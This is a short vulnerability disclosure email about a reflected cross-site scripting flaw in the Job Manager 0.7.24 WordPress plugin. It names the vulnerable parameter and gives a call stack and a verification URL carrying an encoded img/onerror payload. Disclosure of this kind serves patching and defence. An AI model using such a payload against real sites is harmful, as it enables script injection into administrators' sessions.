Subject: Cross-Site Scripting (XSS) in Job Manager 0.7.24

Date: Tue, 25 Aug 2015 14:28:52 +0200

Hello,

Plugin: Job Manager 0.7.24 https://wordpress.org/plugins/job-manager/

1. Reflected Cross-Site Scripting (XSS)

Authenticated administrators can inject html/js code (there is no CSRF protection!).

Method: GET

Url: http://localhost/wp-admin/admin.php?page=jobman-list-applications&jobman-rating=[xss]

Vulnerable parameters: jobman-rating

Example PHP callstack:

jobman_list_applications [/job-manager/admin-applications.php:95]

jobman_print_rating_stars [/job-manager/functions.php:60]

Verification:

http://localhost/wp-admin/admin.php?page=jobman-list-applications&jobman-rating=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29+%2F%3E

--

Regards,
Marcin Probola,